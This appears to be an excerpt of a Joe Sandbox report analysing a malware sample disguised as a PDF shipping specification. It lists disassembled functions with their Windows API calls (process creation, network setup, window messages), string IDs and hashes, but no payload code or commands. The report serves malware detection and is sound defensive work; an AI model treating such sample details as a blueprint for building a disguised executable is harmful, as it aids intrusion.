                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CrackInternet
                                      • String ID: |$D9
                                      • API String ID: 1381609488-3281666953
                                      • Opcode ID: f1b18a61842c84e9d4773f2423fb17af849675036e702d20b7d9a4f53d8714d9
                                      • Instruction ID: 5eacfabc5bd0c5773d876d6a6b8d7ddf623ef35c6728153f3a2c8b7a4cbf174c
                                      • Opcode Fuzzy Hash: f1b18a61842c84e9d4773f2423fb17af849675036e702d20b7d9a4f53d8714d9
                                      • Instruction Fuzzy Hash: 13313B71C11119ABCF42EFE4CC85AEE7FB9FF14710F100019F915AA166DB71AA46DBA0
                                      Function 003A975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 003A980E
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003A984A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: 1777d0e92e4137c45a1bc42f2bac697e2daa6f5dddcf3ae1ef48b1e7e225e1cd
                                      • Instruction ID: 6d61365def4418526b220d198d2e039eb885eadc718959cdd40630c2a9a31ea9
                                      • Opcode Fuzzy Hash: 1777d0e92e4137c45a1bc42f2bac697e2daa6f5dddcf3ae1ef48b1e7e225e1cd
                                      • Instruction Fuzzy Hash: F7317C71110604AAEB129F78CC80FFB77ADFF5A760F11861AF9A9D7190CA35AC81C760
                                      Function 0036E4C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(003FA0D0,00000FA0,003F6EA8,00000010,00363503,003F6BB0,0000000C,003634A9,?,003EEEF4,00000040,?,003441C8,00000001,003EEEF4), ref: 0036E580
                                      • EnterCriticalSection.KERNEL32(003FA0D0,?,003441C8,00000001,003EEEF4,?,?,?,?,003439FE,?,00000001), ref: 0036E592
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Enter$CountInitializeSpin
                                      • String ID: "@
                                      • API String ID: 3238990206-895456044
                                      • Opcode ID: b04b9b1f339c0bf326263e8c23e442081273f836d84ecd653e96784ba2bb943e
                                      • Instruction ID: 79aa41de4a1fe053e2eb41c6e7512147fc523e30c80f3849ef133b0e0ac77e3d
                                      • Opcode Fuzzy Hash: b04b9b1f339c0bf326263e8c23e442081273f836d84ecd653e96784ba2bb943e
                                      • Instruction Fuzzy Hash: C731CD799047018FC722CFADC985A19B7E4BF09324B09C16EE955EB2E5DBB0E8048F44
                                      Function 003A93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003A945C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A9467
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                      • Instruction ID: c1f912d311ef5a5e1c44edf510da18047ca04ef74ee43711da1878ead34d7a52
                                      • Opcode Fuzzy Hash: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                      • Instruction Fuzzy Hash: 4711B6713001086FEF12DE55DC80FBB376EEB4A3A4F110126F914AB2E0D6359C528760
                                      Function 003ADA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • GetActiveWindow.USER32 ref: 003ADA7B
                                      • EnumChildWindows.USER32(?,003AD75F,00000000), ref: 003ADAF5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ActiveChildEnumLongWindows
                                      • String ID: T19
                                      • API String ID: 3814560230-229429444
                                      • Opcode ID: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                      • Instruction ID: 1d0575a093b9042e3b146d6f59bf858af23ee004953e046d3f54da22c2989389
                                      • Opcode Fuzzy Hash: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                      • Instruction Fuzzy Hash: A7212F75204201DFC716DF28D950AA5B7E9EF5A320F250A29F966977F0DB31A800CF64
                                      Function 003A98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                        • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                        • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      • GetWindowRect.USER32(00000000,?), ref: 003A9968
                                      • GetSysColor.USER32(00000012), ref: 003A9982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                      • Instruction ID: f87fb799bb2250212c0d4ba5728531e7088ae941c902c3059e41511c7f38cd7a
                                      • Opcode Fuzzy Hash: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                      • Instruction Fuzzy Hash: 26112672520209AFDB16DFB8CC45EEA7BA8FB09344F014A2DF955E2250E735E851DB60
                                      Function 003A9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 003A9699
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003A96A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 06e5565cf3a252fd789d934dd5a3827818b01eaa6bc15c61be8b8fc033078a21
                                      • Instruction ID: 231b6ba8f42e42a62d55792bfb258a699e93681c298f285b116eb2b9f6ce7351
                                      • Opcode Fuzzy Hash: 06e5565cf3a252fd789d934dd5a3827818b01eaa6bc15c61be8b8fc033078a21
                                      • Instruction Fuzzy Hash: EF115871500108AAEB125F689C44FEB3B6EEF0A378F514726F965A61E0C735AC519760
                                      Function 00394D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00394DF5
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00394E1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 22f599d7910ed36c0b68bbd36a479740fb20104ffdd13b513c6ef80d66f602b0
                                      • Instruction ID: d3771dcc4807a765c6a7ba6af10e57ef48809c86f04729fb3d5fddcf80714528
                                      • Opcode Fuzzy Hash: 22f599d7910ed36c0b68bbd36a479740fb20104ffdd13b513c6ef80d66f602b0
                                      • Instruction Fuzzy Hash: D411AC74501221BBDF268F61C888EFBFBACFF06755F10822AF50596540D370A942C6E0
                                      Function 0039A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                      • htons.WSOCK32(00000000,?,00000000), ref: 0039A88B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: 44b33e43813e67f5f83c63b7bfd25820d104852b6e451d574778b99a7ebd253d
                                      • Instruction ID: d762985a7e6169af9c82e2d00551f3f2a1a4789f7da5a3ae0d1a1e29beb619e7
                                      • Opcode Fuzzy Hash: 44b33e43813e67f5f83c63b7bfd25820d104852b6e451d574778b99a7ebd253d
                                      • Instruction Fuzzy Hash: 8F01D275204304ABCB22AF68C88AFA9B768EF44310F10866AF5169B3D1D771E801C792
                                      Function 0037B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0037B7EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: f0ba1e32af0f940a49d78a857a2438029949b137ce9c8f6ba6c77e813827b887
                                      • Instruction ID: f2e1a435262e0bef405adba08e36609703b6769899a131b2a994cb4efafc23a5
                                      • Opcode Fuzzy Hash: f0ba1e32af0f940a49d78a857a2438029949b137ce9c8f6ba6c77e813827b887
                                      • Instruction Fuzzy Hash: 89014C71611118ABCB56EBA4CC42EFE73BDBF06310B04461CF4615B2D1DF746808CB50
                                      Function 0037B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 0037B6EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: a1d30ac80c5785a014163feb6107f97374b4be0f5b032fba8e3aef7e382a5b19
                                      • Instruction ID: 0ed0194c3e140a00e11362c6de6e4a8974177f9c9c1f5fcb7b18ef4ef55995c2
                                      • Opcode Fuzzy Hash: a1d30ac80c5785a014163feb6107f97374b4be0f5b032fba8e3aef7e382a5b19
                                      • Instruction Fuzzy Hash: 53018F71642008ABCB56EBA4C952BFFB3BC9F05340F104029B606BB191DF986E188BA5
                                      Function 0037B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 0037B76C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 43870fca7b7319370d55ba3c8337f162e30ff4abe5ac4199b0e2aead00d145cd
                                      • Instruction ID: 507fa39cf4ceae2af9c3d6b86355d3e7efca1f2f0ebb9f273e4c5c9263b65a44
                                      • Opcode Fuzzy Hash: 43870fca7b7319370d55ba3c8337f162e30ff4abe5ac4199b0e2aead00d145cd
                                      • Instruction Fuzzy Hash: 5A01A271641108ABCB16E7A4C902FFFB3BC9F05344F504019B505BB192DB686E1987B5
                                      Function 003718B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                      • DeleteCriticalSection.KERNEL32(sin,003F6F48,00000010,00364E02), ref: 00371913
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalSection$DeleteEnter
                                      • String ID: sin$"@
                                      • API String ID: 228587788-1414153351
                                      • Opcode ID: 50ab5a3b956e89ad9a9475c79643923096ff88fd6f01f4ae8bf9989fe9eec5b3
                                      • Instruction ID: 5ccb4d7ae25983b2349b11d751b49128d8aadec79515131a576876e3af34ffac
                                      • Opcode Fuzzy Hash: 50ab5a3b956e89ad9a9475c79643923096ff88fd6f01f4ae8bf9989fe9eec5b3
                                      • Instruction Fuzzy Hash: F401C4325002049FC7239BADDA4AA5CB7A4AF45320F55C19AE595EB1E1CBB8C543CB84
                                      Function 003AE32E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403D00,00403D44), ref: 003AE37B
                                      • CloseHandle.KERNEL32 ref: 003AE38D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: D=@
                                      • API String ID: 3712363035-2498164000
                                      • Opcode ID: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                      • Instruction ID: 6c2415e168798f743fdf974b35c1da473c374d4f09a77271ad8e553ea71991ac
                                      • Opcode Fuzzy Hash: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                      • Instruction Fuzzy Hash: 3BF05EF1540314BBE2125F61AC46F777E5CDF04755F008431BE08EA1A2D375AE0087AC
                                      Function 00344024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                      • EnumResourceNamesW.KERNEL32(00000000,0000000E,003867E9,00000063,00000000,7617E4A0,?,?,00343EE1,?,?,000000FF), ref: 003B41B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: EnumImageLoadNamesResource
                                      • String ID: >4
                                      • API String ID: 1578290342-2218818388
                                      • Opcode ID: fda48df709b639b5de687b0f5ee7e98a7f8701c70c15d30f293a91b00064b0a3
                                      • Instruction ID: 12fe98e6c61eb22d38899267f08047ce348cf695278d5de4b2ab386809b91ce9
                                      • Opcode Fuzzy Hash: fda48df709b639b5de687b0f5ee7e98a7f8701c70c15d30f293a91b00064b0a3
                                      • Instruction Fuzzy Hash: 22F0963164032477E6214B19BD46FD23B9DD709BB5F10452AF314FA5E0D3F0A0809798
                                      Function 0037A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0037A63F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 2030045667-4017498283
                                      • Opcode ID: 95c2803b02abd5007182504ae17b4bd3eaea3ed6c845e2575b671cb1c2015702
                                      • Instruction ID: 20ce5ea28145a312a6572c1af6b8b1f8ba9d5cc01c8184cb5818de828a0412fd
                                      • Opcode Fuzzy Hash: 95c2803b02abd5007182504ae17b4bd3eaea3ed6c845e2575b671cb1c2015702
                                      • Instruction Fuzzy Hash: B2D02B323C031837C22336A87C07FD9354C8B05B51F044032FB0CDD5C249D3995042D9
                                      Function 003BAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?), ref: 003BACC0
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003BAEBD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: DirectoryFreeLibrarySystem
                                      • String ID: WIN_XPe
                                      • API String ID: 510247158-3257408948
